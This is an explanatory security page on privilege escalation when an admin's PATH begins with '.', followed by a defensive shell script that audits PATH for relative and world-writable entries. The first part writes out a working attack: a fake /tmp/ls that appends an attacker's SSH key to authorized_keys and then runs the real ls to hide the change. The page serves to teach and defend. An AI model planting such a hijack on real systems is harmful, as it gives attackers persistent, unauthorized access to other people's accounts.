Privilege Escalation With PATH
Imagine a situation where an attacker knows that the server's admin has put a . (the current working directory) at the beginning of their PATH, so the shell searches whatever directory the admin happens to be in before the system directories. The attacker wants to use this vulnerability to escalate their privileges.
In that case, the attacker plants a malicious program in a directory where the admin is likely to run a common command. In this example, the attacker hijacks the ls program by planting the malicious executable in the /tmp/ directory.
They will create a file and make it an executable:
touch /tmp/ls && chmod +x /tmp/ls
The contents of the file could be something like this:
echo "ATTACKER-SSH-PUBLIC-KEY-HERE" >> ~/.ssh/authorized_keys && /bin/ls
When the admin runs ls while in /tmp, the shell finds /tmp/ls before /bin/ls and executes the planted file, which appends the attacker's SSH key to the admin's authorized_keys file. This allows the attacker to log in to the admin's account over SSH. The && /bin/ls part of the command then runs the real ls, so the expected output appears and the victim is less likely to notice anything wrong.
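The defensive counterpart of the scenario above is to audit PATH for the conditions that make the hijack possible: an empty, . or otherwise relative entry (the shell searches the working directory), and any directory in PATH that other users can write to. The following script is an added example written for this page, not part of the original text; the function names and the sample PATH values are constructed for illustration, and it assumes a POSIX sh with ls, cut and printf.

```shell
#!/bin/sh
# Added example (not from the original page): audit a PATH value for entries that
# let a planted executable shadow a system command, and produce a sanitized PATH.
# Assumes POSIX sh; the sample PATH strings used at the bottom are constructed.

# path_has_cwd_entry PATHVALUE
# Returns 0 (true) if PATHVALUE contains an empty entry, ".", or any relative
# directory; each of these makes the shell search the current working directory.
path_has_cwd_entry() {
    rest="$1:"                     # trailing ":" so the last entry is split too
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"        # text before the first ":"
        rest="${rest#*:}"          # drop that entry and its ":"
        case "$entry" in
            ""|[!/]*) return 0 ;;  # empty, ".", "./x", "bin": all relative
        esac
    done
    return 1
}

# path_world_writable_dirs PATHVALUE
# Prints each existing directory in PATHVALUE that is world-writable, since any
# local user could drop an executable there. Returns 0 if any were found, else 1.
path_world_writable_dirs() {
    rest="$1:"
    found=1
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"
        rest="${rest#*:}"
        [ -d "$entry" ] || continue
        # "ls -ld" prints e.g. "drwxrwxrwt ..."; character 9 is the "other" write bit.
        other_write=$(ls -ld "$entry" | cut -c9)
        if [ "$other_write" = "w" ]; then
            printf '%s\n' "$entry"
            found=0
        fi
    done
    return $found
}

# path_strip_cwd_entries PATHVALUE
# Prints PATHVALUE with every empty or relative entry removed: the value an
# admin would export instead of a PATH that starts with ".".
path_strip_cwd_entries() {
    rest="$1:"
    out=""
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"
        rest="${rest#*:}"
        case "$entry" in
            /*) out="${out:+$out:}$entry" ;;   # keep absolute entries only
        esac
    done
    printf '%s\n' "$out"
}

# Stand-alone use: audit the PATH of the shell running this script.
if path_has_cwd_entry "$PATH"; then
    echo "WARNING: PATH searches the current directory; suggested value:"
    path_strip_cwd_entries "$PATH"
fi
if path_world_writable_dirs "$PATH"; then
    echo "WARNING: the directories above are in PATH and world-writable"
fi
```

Run it as the admin user (or with PATH set to the value from a login profile) to see whether the shell would ever pick up an executable from the working directory; the sanitized value it prints can be exported in place of the original, and the world-writable check catches directories such as /tmp that should never appear in PATH at all.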